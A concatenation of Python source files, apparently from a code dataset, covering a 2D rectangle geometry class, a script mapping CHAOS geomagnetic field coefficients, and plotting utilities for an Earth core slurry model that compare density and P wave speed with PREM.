"""Point at the center of the rectangle (midpoint of AC).
"""
return self.A.midpoint(self.C)
@center.setter
def center(self, new_center):
self.x, self.y = Point(*new_center) - (Point(self.w, self.h) / 2)
@property
def perimeter(self) -> float:
"""The distance around this rectangle.
"""
return sum(self.sides)
@property
def area(self) -> float:
"""The area of this rectangle.
"""
return self.w * self.h
def __contains__(self, other) -> bool:
"""If other is a twod.Point, returns True if the point is inside this
rectangle.
If other is a twod.Rect, returns True if any of other's vertices are
inside or any of the target rectangle's verices are inside other.
Otherwise returns False.
Raises TypeError if other is not a Point or Rect.
"""
if not isinstance(other, Rect):
try:
return other.between(self.A, self.C)
except AttributeError:
pass
raise TypeError(f"expected Point or Rect, received {type(other)}")
for v in other.vertices:
if v.between(self.A, self.C):
return True
for v in self.vertices:
if v.between(other.A, other.C):
return True
return False
def __add__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
x = self.x + other.x
y = self.y + other.y
try:
w = self.w + other.w
h = self.h + other.h
except AttributeError:
w = self.w
h = self.h
return Rect(x, y, w, h)
def __iadd__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
self.x += other.x
self.y += other.y
try:
self.w += other.w
self.h += other.h
except AttributeError:
pass
return self
def __sub__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
x = self.x - other.x
y = self.y - other.y
try:
w = self.w - other.w
h = self.h - other.h
except AttributeError:
w = self.w
h = self.h
return Rect(x, y, w, h)
def __isub__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
self.x -= other.x
self.y -= other.y
try:
self.w -= other.w
self.h -= other.h
except AttributeError:
pass
return self
def __mul__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
x = self.x * other.x
y = self.y * other.y
try:
w = self.w * other.w
h = self.h * other.h
except AttributeError:
w = self.w
h = self.h
return Rect(x, y, w, h)
def __imul__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
self.x *= other.x
self.y *= other.y
try:
self.w *= other.w
self.h *= other.h
except AttributeError:
pass
return self
def __truediv__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
try:
x = self.x / other.x
y = self.y / other.y
try:
w = self.w / other.w
h = self.h / other.h
except AttributeError:
w = self.w
h = self.h
return Rect(x, y, w, h)
except ZeroDivisionError:
pass
raise ZeroDivisionError(other)
def __itruediv__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
try:
self.x /= other.x
self.y /= other.y
try:
self.w /= other.w
self.h /= other.h
except AttributeError:
pass
return self
except ZeroDivisionError:
pass
raise ZeroDivisionError(other)
def __floordiv__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
try:
x = self.x // other.x
y = self.y // other.y
try:
w = self.w // other.w
h = self.h // other.h
except AttributeError:
w = self.w
h = self.h
return Rect(x, y, w, h)
except ZeroDivisionError:
pass
raise ZeroDivisionError(other)
def __ifloordiv__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
try:
self.x //= other.x
self.y //= other.y
try:
self.w //= other.w
self.h //= other.h
except AttributeError:
pass
return self
except ZeroDivisionError:
pass
raise ZeroDivisionError(other)
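# --- Illustrative sketch of the geometry helpers above (assumes twod.Point's midpoint()
# --- and between() behave as their names suggest) ---
#   r = Rect(1, 2, 3, 4)       # origin (1, 2), width 3, height 4
#   r.vertices  -> [Point(1, 2), Point(4, 2), Point(4, 6), Point(1, 6)]
#   r.center    -> Point(2.5, 4.0)   # midpoint of A and C
#   r.area      -> 12
#   Point(2, 3) in r  -> True        # delegated to Point.between(A, C)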
``` |
{
"source": "jnywong/chaos",
"score": 2
} |
#### File: jnywong/chaos/script.py
```python
import chaosmagpy
import shtns
import pyshtools as pysh
import cartopy.crs as ccrs
import matplotlib.pyplot as plt
from paropy.plot_utils import rad_to_deg, get_Z_lim
import scipy.special as sp
import numpy as np
lmax = 20
nphi = 480
ntheta = 200
fig_aspect = 0.8
n_levels = 30
def get_grid(nphi=256, ntheta=128):
phi = np.linspace(0., 2*np.pi, nphi)
x, w = sp.roots_legendre(ntheta)
theta = np.sort(np.arccos(x))
p2D = np.zeros([nphi, ntheta])
th2D = np.zeros([nphi, ntheta])
for i in range(nphi):
p2D[i, :] = phi[i]
for j in range(ntheta):
th2D[:, j] = theta[j]
return p2D, th2D
# Load CHAOS data
model = chaosmagpy.load_CHAOS_matfile('CHAOS-7.7.mat')
time = 2020.
timeCHAOS = chaosmagpy.data_utils.dyear_to_mjd(time)
# Gauss, max. degree 20
# g10, g11, h11, g20, g21, h21, g22, h22
ylm = model.synth_coeffs_tdep(timeCHAOS)
dtglm = model.synth_coeffs_tdep(timeCHAOS,deriv=1) # Secular Variation
mmax = lmax
sh = shtns.sht(lmax, mmax)
nlat, nphi = sh.set_grid(nlat = ntheta, nphi = nphi)
# Construct complex Gauss coefficients
k=0
j=0
m=0
glm = np.zeros(int(lmax*(lmax+3)/2))
hlm = np.zeros(int(lmax*(lmax+3)/2))
for l in range(1,lmax+1):
for i in range(2*l+1):
if i==0:
glm[j] = ylm[k]
hlm[j]= 0.0
j +=1
m+=1
else:
if np.mod(i,2) == 1:
glm[j] = ylm[k]
j+=1
else:
hlm[m] = ylm[k]
m+=1
k+=1
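# After the loops, glm and hlm are indexed by (l, m) pairs in the order
# (1,0), (1,1), (2,0), (2,1), (2,2), ... so glm = [g10, g11, g20, g21, g22, ...]
# and hlm = [0, h11, 0, h21, h22, ...] (the h_l0 terms are zero by construction).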
# Set g00 = 0 (no monopoles)
glm = np.insert(glm,0,0)
hlm = np.insert(hlm, 0, 0)*1j
Ylm = np.zeros(int(lmax*(lmax+3)/2+1),dtype=np.cdouble)
Ylm = glm + hlm
X,Y = get_grid(nphi=nphi, ntheta = ntheta)
Br = np.zeros_like(X)
cilm = pysh.shio.SHCindexToCilm(Ylm)
clm = pysh.SHCoeffs.from_array(cilm, normalization='ortho',csphase=-1)
# Z = sh.synth(Ylm)
Z = Br
w, h = plt.figaspect(fig_aspect)
fig, ax = plt.subplots(1, 1, figsize=(1.5*w, h),
subplot_kw={'projection': ccrs.Mollweide()})
# phi = np.linspace(0,2*np.pi,nphi)
# theta = np.linspace(0, np.pi, ntheta)
# X, Y = rad_to_deg(phi, theta)
# Z_lim = get_Z_lim(Z)
Z_lim = 20000
levels = np.linspace(-Z_lim, Z_lim, n_levels)
c = ax.contourf(X, Y, Z, levels, transform=ccrs.PlateCarree(), cmap='PuOr_r',
extend='both')
fig.show()
``` |
{
"source": "jnywong/nondim-slurry",
"score": 2
} |
#### File: nondim-slurry/slurpy/plot_utils.py
```python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.ticker as mticker
from matplotlib import cm
import pickle
import os
import matplotlib as mpl
mpl.rcParams['text.usetex'] = False
import matplotlib.gridspec as gridspec
from slurpy.data_utils import readdata, get_outputDir
from slurpy.getparameters import getcsbmassoxygen, getKphi, getphi
from slurpy.coreproperties import icb_radius, earth_radius, aO, density_solidFe
from slurpy.lookup import premdensity, liquidus, premvp, ak135radius, ak135vp
# %%
def plot_profile(inputDir):
# Read data
try:
# print(inputDir)
inputs,outputs,profiles = readdata(inputDir)
except:
print('Folder does not exist')
# print('State = {}'.format(outputs.state.iloc[0]))
# Plots
csb_radius = pd.to_numeric(profiles.r.iloc[-1])
radius=(profiles.r)*1e-3
w, h = plt.figaspect(0.75)*2
# Temperature
    fig1, ((ax1,ax2),(ax3,ax4)) = plt.subplots(2,2,sharex=True,figsize=(w,h))
ax1.plot(radius,profiles.temp)
ax1.set(ylabel="Temperature (K)")
# Oxygen
(mass_conc_O,acore) =getcsbmassoxygen(inputs.oxygen_bulk)
acore=float(acore)
ax2.plot(radius,profiles.oxygen*acore/aO*100)
ax2.set(ylabel="Oxygen (mol.%)")
ax3.plot(radius,profiles.solidflux)
ax3.set(xlabel="Radius (km)",ylabel="Solid flux ($\mathrm{kg m^{-2} s^{-1}}$)")
# Density
ax4.plot(radius,profiles.density)
ax4.set(xlabel="Radius (km)",ylabel="Density ($\mathrm{kg m^{-3}}$)")
# Liquidus
radius_liquidus=np.linspace(icb_radius,csb_radius)
temp_liquidus=liquidus(radius_liquidus)
ax1.plot(radius_liquidus*1e-3,temp_liquidus,'k--', label = 'Liquidus (Davies et al. 2015)')
ax1.legend()
# Seismology
radius_prem=np.linspace(icb_radius,csb_radius)
density_prem=premdensity(radius_prem)
ax4.plot(radius_prem*1e-3,density_prem,'k--')
ax4.set(xlabel="Radius (km)",ylabel="Density ($\mathrm{kg m^{-3}}$)")
ax1.set(ylabel="Temperature (K)")
ax2.set(ylabel="Oxygen (mol.%)")
ax3.set(xlabel="Radius (km)",ylabel="Solid flux ($\mathrm{kg m^{-2} s^{-1}}$)")
ax1.set_xlim([radius.iloc[0],radius.iloc[-1]])
plt.tight_layout()
plt.show()
# %%
def plot_sensitivity(csb_temp,csb_oxygen,csb_temp0,csb_oxy0,saveOn,aspectRatio=0.75):
w, h = plt.figaspect(aspectRatio)
fig1, (ax1,ax2) = plt.subplots(1,2,figsize=(2*w,h),sharey=True)
# Temperature
nTemp = csb_temp.size
colors=plt.cm.OrRd(np.linspace(0.4,1,nTemp))
den_jump=[]
for i in range(nTemp):
filename = 'sensitivity/temp_{:.0f}'.format(csb_temp[i]).replace('.','_')
with open(filename, 'rb') as f:
(radius,temp,xi,solidFlux,density)=pickle.load(f)
if i ==0 or i == nTemp-1:
ax1.plot(radius*1e-3,density,color=colors[i], linewidth = 2,
label =r'$T^{{sl}}=${:.0f} K'.format(csb_temp[i]))
# Reference case
elif csb_temp[i]==csb_temp0:
den_jump0 = density[0]-density[-1]
ax1.plot(radius*1e-3,density,color='silver', linewidth = 2,
label=r'$T^\mathregular{{sl}}=$5457 K')
else:
ax1.plot(radius*1e-3,density,color=colors[i])
den_jump.append(density[0]-density[-1])
# PREM
density_prem=premdensity(radius)
ax1.plot(radius*1e-3,density_prem, 'k', linestyle = '--')
ax1.legend(fontsize=11.5)
ax1.set_xlim([radius[0]*1e-3,radius[-1]*1e-3])
ax1.set(xlabel="Radius (km)",ylabel="Density ($\mathrm{kg m^{-3}}$)")
den_low = (den_jump[0]-den_jump0)/den_jump0*100
den_high = (den_jump[-1]-den_jump0)/den_jump0*100
print('Temperature: Density jump ranges from {:.2f}% to {:.2f}% of reference'.format(den_low, den_high))
# Oxygen
nOxy = csb_oxygen.size
colors=plt.cm.GnBu(np.linspace(0.4,1,nOxy))
den_jump=[]
for i in range(nOxy):
filename = 'sensitivity/oxy_{:.1f}'.format(csb_oxygen[i]).replace('.','_')
with open(filename, 'rb') as f:
(radius,temp,xi,solidFlux,density)=pickle.load(f)
if i ==0 or i == nOxy-1:
ax2.plot(radius*1e-3,density,color=colors[i], linewidth = 2,
label =r'$\xi^{{sl}}=${:.1f} mol.%'.format(csb_oxygen[i]))
# Reference case
elif csb_oxygen[i]==csb_oxy0:
den_jump0 = density[0]-density[-1]
ax2.plot(radius*1e-3,density,color='silver', linewidth = 2,
label=r'$\xi^{{sl}}=$8.0 mol.%')
else:
ax2.plot(radius*1e-3,density,color=colors[i])
den_jump.append(density[0]-density[-1])
# PREM
density_prem=premdensity(radius)
ax2.plot(radius*1e-3,density_prem, 'k', linestyle = '--', label = r'PREM')
ax2.legend(fontsize=11.5)
ax2.set_xlim([radius[0]*1e-3,radius[-1]*1e-3])
ax2.set(xlabel="Radius (km)")
den_low = (den_jump[0]-den_jump0)/den_jump0*100
den_high = (den_jump[-1]-den_jump0)/den_jump0*100
print('Oxygen: Density jump ranges from {:.2f}% to {:.2f}% of reference'.format(den_low, den_high))
ax1.set_title('(a)',x=0.95,y=1,fontsize=14)
ax2.set_title('(b)',x=0.95,y=1,fontsize=14)
if saveOn==1:
saveDir='figures/sensitivity/'
if not os.path.exists(saveDir):
os.makedirs(saveDir)
fig1.savefig(saveDir+"temp_oxy.pdf",format='pdf', dpi=200, bbox_inches='tight')
fig1.savefig(saveDir+"temp_oxy.png",format='png', dpi=200, bbox_inches='tight')
print('Figure saved as {}'.format(saveDir+"temp_oxy.pdf"))
# %%
def plot_sedimentation(sed_con,saveOn,mol_conc_oxygen_bulk=8,figAspect=0.75):
nSed = sed_con.size
colors=plt.cm.gnuplot_r(np.linspace(0.4,1,nSed))
w, h = plt.figaspect(figAspect)
fig, (ax1,ax2) = plt.subplots(2,1,sharex=True,figsize=(w,2*h))
# Format function for scientific notation in legend
my_fun = mticker.ScalarFormatter(useOffset=False, useMathText=True)
for i in range(nSed):
filename = 'sensitivity/sed_{:.0f}'.format(np.log10(sed_con[i])).replace('.','_')
with open(filename, 'rb') as f:
(radius,temp,xi,solidFlux,density)=pickle.load(f)
# FIX:
# ax1.plot(radius*1e-3,density,label=r'$k_\phi =$ {} $\mathrm{{kgm^{{-3}}s}}$'.format(my_fun.format_data(sed_con[i])),
# color=colors[i])
ax1.plot(radius*1e-3,density,label=r'$k_\phi = {} \mathrm{{kgm^{{-3}}s}}$'.format(my_fun.format_data(sed_con[i])).replace('{','{{').replace('}','}}'),
color=colors[i])
ax1.plot(radius*1e-3,density,color=colors[i])
Kphi = getKphi(sed_con[i],radius,mol_conc_oxygen_bulk)
phi = getphi(Kphi,solidFlux)
ax2.plot(radius*1e-3,phi,color=colors[i])
# PREM
density_prem=premdensity(radius)
ax1.plot(radius*1e-3,density_prem,'k--', label='PREM')
ax1.set(ylabel="Density ($\mathrm{kg m^{-3}}$)") #,yscale="log")
ax2.set(xlabel="Radius (km)",ylabel="Solid fraction",yscale='log')
ax2.axhline(0.6,color='k',linestyle='--') # rheological transition
# labels = ['$k_\phi =${} $\mathrm{{kgm^{{-3}}s}}$'.format(my_fun.format_data(sed_con[i])),
# '1','2','3','4']
fig.legend(loc='center right', bbox_to_anchor=(1.4, 0.5),fontsize = 11.5)
ax1.set_xlim([radius[0]*1e-3,radius[-1]*1e-3])
ax2.set_ylim([1e-4,1])
ax1.set_title('(a)',x=0.95,y=1,fontsize=14)
ax2.set_title('(b)',x=0.95,y=1,fontsize=14)
if saveOn==1:
saveDir='figures/sensitivity/'
if not os.path.exists(saveDir):
os.makedirs(saveDir)
fig.savefig(saveDir+"sedimentation.pdf",format='pdf', dpi=200, bbox_inches='tight')
fig.savefig(saveDir+"sedimentation.png",format='png', dpi=200, bbox_inches='tight')
print('Figure saved as {}'.format(saveDir+"sedimentation.pdf"))
plt.show()
# %%
def plot_seismic(layer_thickness, thermal_conductivity,
icb_heatflux, csb_heatflux,saveOn,figAspect=0.75):
w, h = plt.figaspect(figAspect)
fig, ax = plt.subplots(1,1,figsize=(1.25*w,1.25*h))
n = layer_thickness.size*thermal_conductivity.size \
*icb_heatflux.size*csb_heatflux.size
if n!=1:
fig_label = [r'high $Le$', r'low $Le$']
start = 0.2
stop = 0.5
cm_subsection = np.linspace(start, stop, n)
colors = [ cm.gray_r(x) for x in cm_subsection ]
# Load data
k=0
for w,x,y,z in [(w,x,y,z) for w in layer_thickness for x in icb_heatflux for y in csb_heatflux for z in thermal_conductivity]:
foldername, filename = get_outputDir(w,x,y,z)
inputDir = "results/{}/{}/".format(foldername,filename)
try:
inputs,outputs,profiles = readdata(inputDir)
except:
print('{} does not exist'.format(inputDir))
return
# Calculate bulk modulus from PREM
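        # (For a fluid, vp = sqrt(K/rho) so K = rho*vp**2; PREM supplies vp and rho here,
        #  and the slurry density below replaces rho to give the slurry P wave speed.)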
bulk_modulus = premvp(profiles.r)**2*premdensity(profiles.r)
# Calculate vp using slurry density and PREM bulk modulus
vp_slurry = np.sqrt(bulk_modulus/profiles.density)
# Calculate FVW P wave speed (Ohtaki et al. 2015, fig 11a)
x = profiles.r/earth_radius
vp_fvw = 3.3*x[0]-3.3*x +10.33
max_diff = np.max((vp_fvw-vp_slurry*1e-3)/vp_fvw*100)
print('Maximum difference with Ohtaki et al. (2015) is {:.2f}%'.format(max_diff))
max_diff = np.max((premvp(profiles.r)-vp_slurry)/premvp(profiles.r)*100)
print('Maximum difference with PREM is {:.2f}%'.format(max_diff))
print('Density on slurry side of ICB is {:.2f}'.format(profiles.density[0]))
density_jump = profiles.density[0] - profiles.density.iloc[-1]
print('Density jump is {:.2f}'.format(density_jump))
rho_bod = density_solidFe - profiles.density[0]
print('Delta rho bod is {:.2f}'.format(rho_bod))
rho_mod = rho_bod + density_jump
print('Delta rho mod is {:.2f}'.format(rho_mod))
# Plot P wave speed
if n==1:
ax.plot(profiles.r*1e-3,vp_slurry*1e-3,color='darkgrey',lw=2,label='slurry') #(km/s)
ax.vlines(profiles.r[0]*1e-3,vp_slurry[0]*1e-3,10.4,color='darkgrey',lw=2)
else:
ax.plot(profiles.r*1e-3,vp_slurry*1e-3,color=colors[k],lw=2,label=fig_label[k]) #(km/s)
ax.vlines(profiles.r[0]*1e-3,vp_slurry[0]*1e-3,10.4,color=colors[k],lw=2)
# Check density
# ax1.plot(profiles.r*1e-3,premdensity(profiles.r),'k--')
# ax1.plot(profiles.r*1e-3,profiles.density)
k+=1
# Look up AK135
radius_ak135 = ak135radius()
vp_ak135 = ak135vp(radius_ak135)
# Plot FVW, PREM and AK135
ax.plot(profiles.r*1e-3,vp_fvw,color='blue',lw=2,ls=':',label='Ohtaki et al. (2015)')
ax.vlines(profiles.r[0]*1e-3,vp_fvw[0],10.4,color='blue',lw=2,ls=':')
ax.plot(profiles.r*1e-3,premvp(profiles.r)*1e-3,color='k',ls='--',label='PREM')
ax.vlines(profiles.r[0]*1e-3,premvp(profiles.r[0])*1e-3,10.4, 'k', linestyle='--')
ax.plot(radius_ak135*1e-3,vp_ak135*1e-3,'k',label='ak135')
ax.vlines(radius_ak135[0]*1e-3,vp_ak135[0]*1e-3,10.4, 'k')
ax.legend(loc = 0, fontsize=11.5)
ax.set(xlabel="Radius (km)")
ax.set(ylabel="P wave speed (km/s)")
ax.set_xlim([1200,profiles.r.iloc[-1]*1e-3])
ax.set_ylim([10.25,10.4])
major_xticks = np.arange(1200,1370,20)
minor_xticks = np.arange(1200,1370,5)
major_yticks = np.arange(10.25,10.4,0.05)
minor_yticks = np.arange(10.25,10.4,0.01)
ax.set_xticks(major_xticks)
ax.set_xticks(minor_xticks, minor=True)
ax.set_yticks(major_yticks)
ax.set_yticks(minor_yticks, minor=True)
ax.grid(which='minor', alpha=0.2)
ax.grid(which='major', alpha=0.5)
ax.tick_params(which='major',length = 7)
ax.tick_params(which='minor',length = 3.5)
if saveOn==1:
saveDir='figures/seismic/'
if not os.path.exists(saveDir+foldername):
os.makedirs(saveDir+foldername)
fig.savefig(saveDir+foldername+"/"+filename+".pdf",format='pdf', dpi=200, bbox_inches='tight')
fig.savefig(saveDir+foldername+"/"+filename+".png",format='png', dpi=200, bbox_inches='tight')
print('Figure saved as {}'.format(saveDir+foldername+"/"+filename+".pdf"))
plt.show()
return profiles.r, vp_slurry, profiles.density, vp_fvw
# %%
def plot_seismic_dark(layer_thickness, thermal_conductivity,
icb_heatflux, csb_heatflux,saveOn,figAspect=0.75):
w, h = plt.figaspect(figAspect)
fig, ax = plt.subplots(1,1,figsize=(1.25*w,1.25*h))
n = layer_thickness.size*thermal_conductivity.size \
*icb_heatflux.size*csb_heatflux.size
if n!=1:
fig_label = [r'high $Le$', r'low $Le$']
start = 0.2
stop = 0.5
cm_subsection = np.linspace(start, stop, n)
colors = [ cm.gray_r(x) for x in cm_subsection ]
# Load data
k=0
for w,x,y,z in [(w,x,y,z) for w in layer_thickness for x in icb_heatflux for y in csb_heatflux for z in thermal_conductivity]:
foldername, filename = get_outputDir(w,x,y,z)
inputDir = "results/{}/{}/".format(foldername,filename)
try:
inputs,outputs,profiles = readdata(inputDir)
except:
print('{} does not exist'.format(inputDir))
return
# Calculate bulk modulus from PREM
bulk_modulus = premvp(profiles.r)**2*premdensity(profiles.r)
# Calculate vp using slurry density and PREM bulk modulus
vp_slurry = np.sqrt(bulk_modulus/profiles.density)
# Calculate FVW P wave speed (Ohtaki et al. 2015, fig 11a)
x = profiles.r/earth_radius
vp_fvw = 3.3*x[0]-3.3*x +10.33
max_diff = np.max((vp_fvw-vp_slurry*1e-3)/vp_fvw*100)
print('Maximum difference with Ohtaki et al. (2015) is {:.2f}%'.format(max_diff))
max_diff = np.max((premvp(profiles.r)-vp_slurry)/premvp(profiles.r)*100)
print('Maximum difference with PREM is {:.2f}%'.format(max_diff))
print('Density on slurry side of ICB is {:.2f}'.format(profiles.density[0]))
density_jump = profiles.density[0] - profiles.density.iloc[-1]
print('Density jump is {:.2f}'.format(density_jump))
rho_bod = density_solidFe - profiles.density[0]
print('Delta rho bod is {:.2f}'.format(rho_bod))
rho_mod = rho_bod + density_jump
print('Delta rho mod is {:.2f}'.format(rho_mod))
# Plot P wave speed
if n==1:
ax.plot(profiles.r*1e-3,vp_slurry*1e-3,color='darkgrey',lw=2,label='slurry') #(km/s)
ax.vlines(profiles.r[0]*1e-3,vp_slurry[0]*1e-3,10.4,color='darkgrey',lw=2)
else:
ax.plot(profiles.r*1e-3,vp_slurry*1e-3,color=colors[k],lw=2,label=fig_label[k]) #(km/s)
ax.vlines(profiles.r[0]*1e-3,vp_slurry[0]*1e-3,10.4,color=colors[k],lw=2)
# Check density
# ax1.plot(profiles.r*1e-3,premdensity(profiles.r),'k--')
# ax1.plot(profiles.r*1e-3,profiles.density)
k+=1
# Look up AK135
radius_ak135 = ak135radius()
vp_ak135 = ak135vp(radius_ak135)
ax.plot(profiles.r*1e-3,vp_fvw,color='blue',lw=2,ls=':',label='Ohtaki et al. (2015)')
ax.vlines(profiles.r[0]*1e-3,vp_fvw[0],10.4,color='blue',lw=2,ls=':')
ax.plot(profiles.r*1e-3,premvp(profiles.r)*1e-3,color='white',ls='--',label='PREM')
ax.vlines(profiles.r[0]*1e-3,premvp(profiles.r[0])*1e-3,10.4, 'white', linestyle='--')
ax.plot(radius_ak135*1e-3,vp_ak135*1e-3,'white',label='ak135')
ax.vlines(radius_ak135[0]*1e-3,vp_ak135[0]*1e-3,10.4, 'white')
ax.legend(fontsize=11.5)
ax.set(xlabel="Radius (km)")
ax.set(ylabel="P wave speed (km/s)")
ax.set_xlim([1200,profiles.r.iloc[-1]*1e-3])
ax.set_ylim([10.1,10.4])
plt.yticks(np.arange(10.1,10.41,0.1))
if saveOn==1:
saveDir='figures/seismic/'
if not os.path.exists(saveDir+foldername):
os.makedirs(saveDir+foldername)
fig.savefig(saveDir+foldername+"/"+filename+"_dark.pdf",format='pdf', dpi=200, bbox_inches='tight')
fig.savefig(saveDir+foldername+"/"+filename+"_dark.png",format='png', dpi=200, bbox_inches='tight')
print('Figure saved as {}'.format(saveDir+foldername+"/"+filename+".pdf"))
plt.show()
return profiles.r, vp_slurry, profiles.density
# %%
def plot_compare(layer_thickness,csb_heatflux,icb_heatflux,thermal_conductivity,
saveOn,saveTag,mol_conc_oxygen_bulk=8.,mol_conc_SSi=8.,
self_diffusion=0.98e-8,aspectRatio=0.75,tempMin=5400,
tempMax = 5800,xiMin = 6,xiMax = 8,jMin = -3.5e-7,jMax = 0,
denMin=11900,denMax = 12250):
w,h= plt.figaspect(aspectRatio)*2
    fig, ((ax1,ax2),(ax3,ax4)) = plt.subplots(2,2,sharex=True,figsize=(w,h))
colors = plt.cm.tab10(np.linspace(0,1,layer_thickness.size))
plt.rcParams["axes.prop_cycle"] = plt.cycler("color", plt.cm.tab10.colors)
for i in (range(layer_thickness.size)):
foldername,filename = get_outputDir(layer_thickness[i],icb_heatflux,
csb_heatflux,thermal_conductivity)
inputDir=foldername+"/"+filename
data_in,data_out,data_profiles=readdata(inputDir)
radius=(data_profiles['r'])*1e-3
oxygen=data_profiles['oxygen']
(mass_conc_O,acore) =getcsbmassoxygen(data_in.oxygen_bulk)
acore=float(acore)
ax1.plot(radius,data_profiles['temp'],label='_nolegend_')#, color=colors[i])
ax2.plot(radius,oxygen*acore/aO*100)#, color=colors[i])
ax3.plot(radius,data_profiles['solidflux'])#,color=colors[i])
ax4.plot(radius,data_profiles['density'],
label='{:.0f} km'.format(layer_thickness[i]*1e-3))#,color=colors[i])
# Liquidus
radius_liquidus=np.linspace(icb_radius,icb_radius+400e3)
temp_liquidus=liquidus(radius_liquidus)
ax1.plot(radius_liquidus*1e-3,temp_liquidus,'k--',label = 'Liquidus (Davies et al. 2015)')
# PREM
radius_prem=np.linspace(icb_radius,icb_radius+400e3)
density_prem=premdensity(radius_prem)
ax4.plot(radius_prem*1e-3,density_prem,'k--',label='PREM')
ax4.set(xlabel="Radius (km)",ylabel="Density ($\mathrm{kg m^{-3}}$)")
# Axis titles
ax1.set(ylabel="Temperature (K)")
ax2.set(ylabel="Oxygen (mol.%)")
ax3.set(xlabel="Radius (km)",ylabel="Solid flux ($\mathrm{kg m^{-2} s^{-1}}$)")
# Legend
ax1.legend(fontsize=11.5,loc=1)
ax4.legend(fontsize=11.5,loc=1)
# Axis limits
ax1.set_ylim([tempMin,tempMax])
ax2.set_ylim([xiMin,xiMax])
ax3.set_ylim([jMin,jMax])
ax4.set_ylim([denMin,denMax])
ax1.set_xlim([1220,(icb_radius+400e3)*1e-3])
# Subfigure labels
ax1.text(1225,tempMax-23,'(a)',fontsize=14)
ax2.text(1225,xiMax - 0.12,'(b)',fontsize=14)
ax3.text(1225,jMax - .2e-7,'(c)',fontsize=14)
ax4.text(1225,denMax - 20,'(d)',fontsize=14)
plt.tight_layout()
if saveOn==1:
if not os.path.exists('figures/profiles'):
os.makedirs('figures/profiles')
saveName=foldername+"_"+filename+saveTag
plt.savefig('figures/profiles/'+saveName+'.pdf',format='pdf',dpi=200)
plt.show()
# %%
def plot_CD(layer_thickness, thermal_conductivity,
icb_heatflux, csb_heatflux,saveOn,figAspect=0.75):
w, h = plt.figaspect(figAspect)
# fig, (ax1,ax2,ax3) = plt.subplots(3,1,figsize=(1.25*w,1.25*h),sharex=True)
fig = plt.figure(constrained_layout=True,figsize=(1.25*w,2*h))
spec = gridspec.GridSpec(ncols=1, nrows=3, figure=fig)
ax1 = fig.add_subplot(spec[0, 0])
ax2 = ax1.twinx()
ax3 = fig.add_subplot(spec[1, 0],sharex=ax1)
n = layer_thickness.size*thermal_conductivity.size \
*icb_heatflux.size*csb_heatflux.size
if n!=1:
fig_label = [r'high $Le$', r'low $Le$']
start = 0.2
stop = 0.5
cm_subsection = np.linspace(start, stop, n)
colors = [ cm.gray_r(x) for x in cm_subsection ]
# Load data
k=0
for w,x,y,z in [(w,x,y,z) for w in layer_thickness for x in icb_heatflux for y in csb_heatflux for z in thermal_conductivity]:
foldername, filename = get_outputDir(w,x,y,z)
inputDir = "results/{}/{}/".format(foldername,filename)
try:
inputs,outputs,profiles = readdata(inputDir)
except:
print('{} does not exist'.format(inputDir))
return
# Calculate bulk modulus from PREM
bulk_modulus = premvp(profiles.r)**2*premdensity(profiles.r)
# Calculate vp using slurry density and PREM bulk modulus
vp_slurry = np.sqrt(bulk_modulus/profiles.density)
# Calculate FVW P wave speed (Ohtaki et al. 2015, fig 11a)
x = profiles.r/earth_radius
vp_fvw = 3.3*x[0]-3.3*x +10.33
max_diff = np.max((vp_fvw-vp_slurry*1e-3)/vp_fvw*100)
print('Maximum difference with Ohtaki et al. (2015) is {:.2f}%'.format(max_diff))
max_diff = np.max((premvp(profiles.r)-vp_slurry)/premvp(profiles.r)*100)
print('Maximum difference with PREM is {:.2f}%'.format(max_diff))
print('Density on slurry side of ICB is {:.2f}'.format(profiles.density[0]))
density_jump = profiles.density[0] - profiles.density.iloc[-1]
print('Density jump is {:.2f}'.format(density_jump))
rho_bod = density_solidFe - profiles.density[0]
print('Delta rho bod is {:.2f}'.format(rho_bod))
rho_mod = rho_bod + density_jump
print('Delta rho mod is {:.2f}'.format(rho_mod))
# Plot P wave speed
if n==1:
ax3.plot(profiles.r*1e-3,vp_slurry*1e-3,color='darkgrey',lw=2,label='slurry density') #(km/s)
ax3.vlines(profiles.r[0]*1e-3,vp_slurry[0]*1e-3,10.4,color='darkgrey',lw=2)
else:
ax3.plot(profiles.r*1e-3,vp_slurry*1e-3,color=colors[k],lw=2,label=fig_label[k]) #(km/s)
ax3.vlines(profiles.r[0]*1e-3,vp_slurry[0]*1e-3,10.4,color=colors[k],lw=2)
# Check density
# ax3.plot(profiles.r*1e-3,premdensity(profiles.r),'k--')
# ax3.plot(profiles.r*1e-3,profiles.density)
k+=1
# Plot temperature and composition
ax1.plot(profiles.r*1e-3,profiles.temp,lw=2,color='red',label='temperature')
(mass_conc_O,acore) = getcsbmassoxygen(inputs.oxygen_bulk)
acore=float(acore)
ax2.plot(profiles.r*1e-3,profiles.oxygen*acore/aO*100,lw=2,color='blue',label='oxygen')
# Plot FVW, PREM and AK135
ax3.plot(profiles.r*1e-3,vp_fvw,color='black',lw=2,ls=':',label='Ohtaki et al. (2015)')
ax3.vlines(profiles.r[0]*1e-3,vp_fvw[0],10.4,color='black',ls=':',lw=2)
ax3.plot(profiles.r*1e-3,premvp(profiles.r)*1e-3,color='k',ls='--',label='PREM')
ax3.vlines(profiles.r[0]*1e-3,premvp(profiles.r[0])*1e-3,10.4, 'k', linestyle='--')
# ax3.plot(radius_ak135*1e-3,vp_ak135*1e-3,'k',label='ak135')
# ax3.vlines(radius_ak135[0]*1e-3,vp_ak135[0]*1e-3,10.4, 'k')
ax3.legend(fontsize=11.5, loc='upper right')
ax1.set(ylabel="Temperature (K)")
ax1.spines["right"].set_edgecolor('red')
ax1.spines["right"].set_edgecolor('blue')
ax1.yaxis.label.set_color('red')
ax2.set(ylabel="Oxygen (mol.%)")
ax2.spines["left"].set_edgecolor('red')
ax2.spines["right"].set_edgecolor('blue')
ax2.yaxis.label.set_color('blue')
ax2.tick_params(axis='y', colors='blue')
ax1.tick_params(axis='y', which='both', colors='red')
ax3.set(xlabel="Radius (km)")
ax3.set(ylabel="P wave speed (km/s)")
